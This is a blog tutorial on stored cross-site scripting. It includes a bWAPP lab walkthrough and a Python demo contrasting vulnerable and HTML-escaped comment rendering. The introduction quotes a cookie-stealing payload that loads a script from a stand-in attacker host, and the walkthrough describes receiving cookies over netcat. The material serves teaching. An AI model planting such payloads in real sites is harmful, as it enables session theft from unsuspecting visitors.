Introduction to Stored XSS
When an attacker browsing a web application finds a vulnerability that allows them to embed an HTML tag through an input box, the embedded tag becomes a permanent part of that page, and the browser parses this code every time the page is loaded.
For example, in a blogging website the attacker finds a vulnerability in the comment section and embeds this comment.
Attacker’s Comment — Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more
<script src="http://attacker.com/stealcookie.js"> </script>
The "stealcookie.js" file is designed to steal the browser's cookie. Because the file is hosted on another site, the attacker can access it remotely, and once the user's account is compromised the attacker has full control of that account.
The user, meanwhile, has no idea what this piece of comment is doing in the background.
Examples of Stored XSS
How to prevent Stored XSS attack?
To prevent any XSS attack, a Web Application Firewall (WAF) is the best solution to protect a web application.
A WAF is an automated tool that uses artificial intelligence and machine learning algorithms to filter specific content of web application traffic; it can prevent attacks such as XSS, SQL injection, file inclusion and security misconfiguration.
Every time a user sends a request to the web server, the request first goes to the WAF, the WAF filters it, and only then is the request passed on to the web server.
The same applies to the web server's side: when the web server sends a response to the user, the response first goes to the WAF, the WAF filters it, and then it is passed on to the user.
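The introduction above describes the mechanism (a stored comment is concatenated into the page and parsed by every visitor's browser) and this section describes a filter sitting between the user and the web server. The Python example below is added here to illustrate both; it is not code from the original post or from bWAPP. It stores the page's own payload comment in a hypothetical in-memory comment table, renders it once the vulnerable way and once HTML-escaped, runs the same submissions through a toy inbound filter that plays the role of the WAF described above, and shows the HttpOnly attribute on the session cookie as an added defence-in-depth point. The names CommentStore, render_vulnerable, render_escaped, waf_blocks_request and session_cookie_header are assumptions made for this example.

```python
import html
import re

# Constructed sample comments: the benign test comment from the walkthrough and
# the cookie-stealing payload quoted in the introduction.
BENIGN_COMMENT = "Nice Blog"
PAYLOAD_COMMENT = (
    "Nice Blog! a similar type of blog I have also written but with some new "
    "content, please visit my site to read more "
    '<script src="http://attacker.com/stealcookie.js"> </script>'
)

# Matches an opening <script> tag (case-insensitive, tolerating whitespace after '<').
SCRIPT_TAG_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


class CommentStore:
    """Hypothetical in-memory stand-in for the blog's comment table."""

    def __init__(self):
        self.comments = []

    def add(self, text):
        self.comments.append(text)


def render_vulnerable(store):
    """Vulnerable rendering: stored comments are concatenated straight into the
    page, so an embedded <script> tag is parsed by every visitor's browser."""
    return "".join(f'<div class="comment">{c}</div>' for c in store.comments)


def render_escaped(store):
    """Hardened rendering: each comment is HTML-escaped at output time, so '<',
    '>' and quotes become entities and the payload is displayed as plain text."""
    return "".join(
        f'<div class="comment">{html.escape(c, quote=True)}</div>'
        for c in store.comments
    )


def waf_blocks_request(body):
    """Toy stand-in for the inbound filtering the post attributes to a WAF: the
    request body is inspected before it reaches the web server. Only a literal
    <script> opening tag is checked here; a real WAF carries far richer rules."""
    return SCRIPT_TAG_RE.search(body) is not None


def page_has_active_script(page):
    """True when the rendered page still contains a live <script> tag."""
    return SCRIPT_TAG_RE.search(page) is not None


def session_cookie_header(value):
    """Set-Cookie header carrying HttpOnly, so document.cookie cannot read the
    session even if a script does run in the page (defence in depth, not a
    substitute for escaping)."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax"


def demo():
    # Path 1: no WAF, both comments reach the database (the walkthrough scenario).
    store = CommentStore()
    store.add(BENIGN_COMMENT)
    store.add(PAYLOAD_COMMENT)

    # Path 2: the same submissions pass through the inbound filter first.
    filtered = CommentStore()
    for comment in (BENIGN_COMMENT, PAYLOAD_COMMENT):
        if not waf_blocks_request(comment):
            filtered.add(comment)

    return {
        "vulnerable_page_runs_script": page_has_active_script(render_vulnerable(store)),
        "escaped_page_runs_script": page_has_active_script(render_escaped(store)),
        "comments_stored_behind_waf": len(filtered.comments),
        "cookie_is_httponly": "HttpOnly" in session_cookie_header("constructed-session-id"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the block shows the payload surviving into the vulnerable page, being neutralised into entities by render_escaped, and being dropped before storage by the filter. Output encoding at render time is the control that removes the bug itself; the filter and the HttpOnly cookie reduce impact when that encoding is missing somewhere.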
How to perform Stored XSS in a Blogging web application?
Now choose Cross-site-Scripting — Stored (Blog) from the drop-down menu and click Hack.
As you can see from the screenshot, it is a demo blogging application with an input box where users can comment.
To test it, let's enter one comment, "Nice Blog", and hit Submit.
As you can see from the screenshot, the comment gets posted and is stored in the database.
Payload comment to steal the cookie:
Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more
And I’ll fetch this request with the netcat command through a reverse shell.
As you can see from the screenshot, after posting the comment I immediately received the connection with the browser cookie.
This is one way to steal the cookie; there are several techniques an attacker can use to steal the browser's cookie, and every time the webpage is loaded the code executes and fetches the browser cookie.
So the attacker can access the browser cookie of anybody who visits this webpage.
I hope you guys liked this post. Bye bye for now.
Happy Hacking :)